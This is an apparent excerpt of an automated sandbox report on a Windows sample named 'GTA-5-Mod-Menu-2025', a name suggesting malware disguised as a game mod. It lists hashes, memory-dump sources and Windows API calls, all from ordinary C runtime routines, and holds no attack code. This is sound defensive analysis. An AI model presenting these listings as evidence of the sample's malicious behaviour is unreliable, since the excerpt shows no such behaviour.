                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3664257935-537541572
                                                                    • Opcode ID: 0cfbaa8e950179300541a9f106c299b00caf4e615857ee14baab1125214c21e3
                                                                    • Instruction ID: 97e9d84ae089510a5c08ec6ba82b14b9eb0c227958f019faed2653b44d70f808
                                                                    • Opcode Fuzzy Hash: 0cfbaa8e950179300541a9f106c299b00caf4e615857ee14baab1125214c21e3
                                                                    • Instruction Fuzzy Hash: 5521E772E01219ABEF319B659C44A5B3768AB467B0F250214FD05EB290EB74ED00FAD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ffc2c4feda10354afef45c8a710f99b410288491cf7ff8df987d2729a0a52c4b
                                                                    • Instruction ID: 91c069a3b2c4bd251f775bd82e6405f913a325666f0f3183bfd9b49db4c83746
                                                                    • Opcode Fuzzy Hash: ffc2c4feda10354afef45c8a710f99b410288491cf7ff8df987d2729a0a52c4b
                                                                    • Instruction Fuzzy Hash: E3B1D2B5E0424AAFEF11DFA9CC81BAEBBB1BF46314F144158F40197292C7759E41EBA0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00F94424,00F8A93D,00F89B94), ref: 00F9443B
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F94449
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F94462
                                                                    • SetLastError.KERNEL32(00000000,00F94424,00F8A93D,00F89B94), ref: 00F944B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 19bfe50721451d14acfc7d273b515eb61d50a6a59e20d58bcfc0939637f310da
                                                                    • Instruction ID: 49382c49d4f6112997bfa1b71997e8f701cff1eade1f30c6105a9ea15005266a
                                                                    • Opcode Fuzzy Hash: 19bfe50721451d14acfc7d273b515eb61d50a6a59e20d58bcfc0939637f310da
                                                                    • Instruction Fuzzy Hash: 0801D43350A71A6EBF256A79BCC5E2B3684EB61775720033AFD10951E1EF159C027640
                                                                    APIs
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00F94E2B
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00F950A4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: CallUnexpectedtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2673424686-393685449
                                                                    • Opcode ID: 1d0b69a17d2c7afb6b6fd11eb3136ab9ed5bb7eadb4d43e1719054a255dad67d
                                                                    • Instruction ID: 8e1b621ca649cef9029f0863a6ef52fe32879a76698721b42964529bdb798b96
                                                                    • Opcode Fuzzy Hash: 1d0b69a17d2c7afb6b6fd11eb3136ab9ed5bb7eadb4d43e1719054a255dad67d
                                                                    • Instruction Fuzzy Hash: 3DB18E71C0020ADFEF25EFA4C841DAEB7B5BF24310B14456AE9156B212D335EA52EF91
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00FA5644,000000FF,?,00F8F279,00F8F160,?,00F8F315,00000000), ref: 00F8F1ED
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,00FA5644,000000FF,?,00F8F279,00F8F160,?,00F8F315,00000000), ref: 00F8F1FF
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,00FA5644,000000FF,?,00F8F279,00F8F160,?,00F8F315,00000000), ref: 00F8F221
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: d76dfb3c27f8d06555b6f2c8f19b9beb478da1d0858dfeb99062b7dbed283b07
                                                                    • Instruction ID: f36bc089717ac345db1de9b5ae15ef30cd40ac21a63e2d25e8d9785aba7ace64
                                                                    • Opcode Fuzzy Hash: d76dfb3c27f8d06555b6f2c8f19b9beb478da1d0858dfeb99062b7dbed283b07
                                                                    • Instruction Fuzzy Hash: 5A01A2B594061DAFDB119F50DC49FEEBBF8FB05B21F000625E811E22D0DB789900EB90
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 00F96E6F
                                                                    • __alloca_probe_16.LIBCMT ref: 00F96F38
                                                                    • __freea.LIBCMT ref: 00F96F9F
                                                                      • Part of subcall function 00F956B1: HeapAlloc.KERNEL32(00000000,00F97635,?,?,00F97635,00000220,?,?,?), ref: 00F956E3
                                                                    • __freea.LIBCMT ref: 00F96FB2
                                                                    • __freea.LIBCMT ref: 00F96FBF
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 1096550386-0
                                                                    • Opcode ID: e265b308054650751f51a9a03056a2bd04dd1231945ff9dfde47b5f4227b5e28
                                                                    • Instruction ID: 4769d611c48bb634048a6d65c61e5afc0289393d879ea464a069f123c62d78a4
                                                                    • Opcode Fuzzy Hash: e265b308054650751f51a9a03056a2bd04dd1231945ff9dfde47b5f4227b5e28
                                                                    • Instruction Fuzzy Hash: 195197729002066FFF219E65EC45EBB76A9DF44728F150129FD08D6241FB75DC10B7A0
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00F877B9
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00F877C4
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00F87832
                                                                      • Part of subcall function 00F876AF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00F876C7
                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 00F877DF
                                                                    • _Yarn.LIBCPMT ref: 00F877F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                    • String ID:
                                                                    • API String ID: 1088826258-0
                                                                    • Opcode ID: d3c4ef334024c25fc6306221d53b2f6ede452d3747d8e27b709c4b7f91bb258c
                                                                    • Instruction ID: 5f04daa246362c1e49661ae77f31e37cde3b2c594a63e0848c4e07d747094a87
                                                                    • Opcode Fuzzy Hash: d3c4ef334024c25fc6306221d53b2f6ede452d3747d8e27b709c4b7f91bb258c
                                                                    • Instruction Fuzzy Hash: E601BCB5A142148BC706FF20CC956BDBBA1BFC5350B284109E80257382CF38AE02EBD1
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00F9F70C,00000000,?,00FB1E20,?,?,?,00F9F643,00000004,InitializeCriticalSectionEx,00FA90D4,00FA90DC), ref: 00F9F67D
                                                                    • GetLastError.KERNEL32(?,00F9F70C,00000000,?,00FB1E20,?,?,?,00F9F643,00000004,InitializeCriticalSectionEx,00FA90D4,00FA90DC,00000000,?,00F9535C), ref: 00F9F687
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00F9F6AF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3177248105-2084034818
                                                                    • Opcode ID: 39a924ea26b3926f540d38970971b565e9e49389cba57a293815af76abbfa807
                                                                    • Instruction ID: e6596e05a9302da43d67098b527185de99e0bdd205619c727939c85c7b77bc18
                                                                    • Opcode Fuzzy Hash: 39a924ea26b3926f540d38970971b565e9e49389cba57a293815af76abbfa807
                                                                    • Instruction Fuzzy Hash: 30E04F71B8430DB7FF201B60EC0AB693F559B11B62F544430F90CE84F1EBA6E854B945
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00F9D771
                                                                      • Part of subcall function 00F957C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F96F95,?,00000000,-00000008), ref: 00F95822
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F9D9C3
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F9DA09
                                                                    • GetLastError.KERNEL32 ref: 00F9DAAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                    • String ID:
                                                                    • API String ID: 2112829910-0
                                                                    • Opcode ID: 036b815668dc472ea77d01318cd017024e5511eec4d354f28b551bfe50ec5e13
                                                                    • Instruction ID: 6e24bfb7eaafa703dd8b1425dd5af7d625bf63d35ad0a24a14d32e17dd1e8ae1
                                                                    • Opcode Fuzzy Hash: 036b815668dc472ea77d01318cd017024e5511eec4d354f28b551bfe50ec5e13
                                                                    • Instruction Fuzzy Hash: 60D17BB5D042489FEF15CFE8C880AEDBBB5FF09314F28416AE456EB352D634A942DB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: d306b10ba91bb4f0dec3dabd3faa357e8787cce7fbfdc4750acfbafb675266e9
                                                                    • Instruction ID: f13ffd7b116ff19730d926e84be091ed8e0e8163593eccee758490b76470b9b7
                                                                    • Opcode Fuzzy Hash: d306b10ba91bb4f0dec3dabd3faa357e8787cce7fbfdc4750acfbafb675266e9
                                                                    • Instruction Fuzzy Hash: AE51E172A05A069FFF289F10D891FAAB3A4FFA0320F144529E90587291E735FC42E794
                                                                    APIs
                                                                      • Part of subcall function 00F957C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F96F95,?,00000000,-00000008), ref: 00F95822
                                                                    • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00F9B59A
                                                                    • __dosmaperr.LIBCMT ref: 00F9B5A1
                                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00F9B5DB
                                                                    • __dosmaperr.LIBCMT ref: 00F9B5E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1913693674-0
                                                                    • Opcode ID: 6f85fc8f5932b75ae6a67a07ea3930d0a76eeecb53b5eaa1e01ccae440ea86b5
                                                                    • Instruction ID: e0eec8eb89800de93fd39828cfc59094b0350c48782b5ca0a9c1aa83d29ea103
                                                                    • Opcode Fuzzy Hash: 6f85fc8f5932b75ae6a67a07ea3930d0a76eeecb53b5eaa1e01ccae440ea86b5
                                                                    • Instruction Fuzzy Hash: 9A21C871A00209EFBF10AF67ED8196BB7A9FF043657154428F819D7150DB34ED40A7A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ced1a7b8a919bc27145d7c81f21fdc9ef9a5527aa2a86eaa76612e3dac3d99b
                                                                    • Instruction ID: 85ad501fe76829fd42923ac86da5e1ed670a693b04234a59588ef19df9057b5f
                                                                    • Opcode Fuzzy Hash: 5ced1a7b8a919bc27145d7c81f21fdc9ef9a5527aa2a86eaa76612e3dac3d99b
                                                                    • Instruction Fuzzy Hash: 3C215E72A0020AAF9B24FF759C919AA77A9FF043647104525F91AD7650D738EC40A7F0
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00F9C936
                                                                      • Part of subcall function 00F957C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F96F95,?,00000000,-00000008), ref: 00F95822
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F9C96E
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F9C98E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 158306478-0
                                                                    • Opcode ID: d25aa198b65c376e8a6b89d99e82eb0af6ffaedb8f5637e16d676acbc3d83405
                                                                    • Instruction ID: 22f883ed6aac41a8d4fd915d244d43c97afd3ea3460bb2fcb5976f8b29e555f3
                                                                    • Opcode Fuzzy Hash: d25aa198b65c376e8a6b89d99e82eb0af6ffaedb8f5637e16d676acbc3d83405
                                                                    • Instruction Fuzzy Hash: AD1184F2901619BFBF1227B59C89C7F7EACDE867A47500525F906D1101FE289E00B6F5
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000), ref: 00FA4467
                                                                    • GetLastError.KERNEL32(?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000,?,?,?,00F9D446,?), ref: 00FA4473
                                                                      • Part of subcall function 00FA44D0: CloseHandle.KERNEL32(FFFFFFFE,00FA4483,?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000,?,?), ref: 00FA44E0
                                                                    • ___initconout.LIBCMT ref: 00FA4483
                                                                      • Part of subcall function 00FA44A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FA4441,00FA398C,?,?,00F9DB00,?,00000000,00000000,?), ref: 00FA44B8
                                                                    • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000,?), ref: 00FA4498
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 52d5598eae1b06170174b5319b6b8c2e4e2f41a7b63479ba8ae684896df91151
                                                                    • Instruction ID: a56da8238d4c67e4c97c97fc0520322a046aabda7e583ee31901e962e1f3dbd7
                                                                    • Opcode Fuzzy Hash: 52d5598eae1b06170174b5319b6b8c2e4e2f41a7b63479ba8ae684896df91151
                                                                    • Instruction Fuzzy Hash: B0F0307640021CBFCF225F91EC48A9A3F26FB8E3B1F514020FE0896130C7729820BB90
                                                                    APIs
                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F8A307
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F8A316
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00F8A31F
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00F8A32C
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 2933794660-0
                                                                    • Opcode ID: bce81483294894bd674505fa5b2d691fc586897213848fb037e64a0f4125e892
                                                                    • Instruction ID: e5164c47ac02086f04e78d9b9f0eb803f741dcfaa0a18610c6bc353192bee9fa
                                                                    • Opcode Fuzzy Hash: bce81483294894bd674505fa5b2d691fc586897213848fb037e64a0f4125e892
                                                                    • Instruction Fuzzy Hash: 6BF0B2B0C0020CEBCB04DBB4CA4898EBBF4FF1D200B914995E412E7110E734AB44AB50
                                                                    APIs
                                                                      • Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
                                                                      • Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0
                                                                    • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00F8F7C9,?,?,?,00000055,?,-00000050,?,?,?), ref: 00F9A1A5
                                                                    • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00F8F7C9,?,?,?,00000055,?,-00000050,?,?), ref: 00F9A1DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CodePageValid
                                                                    • String ID: utf8
                                                                    • API String ID: 943130320-905460609
                                                                    • Opcode ID: 570e29c9cc324a919aa2efa42e853d5bb62ee6bec9447f22304c7ac9d222a9e7
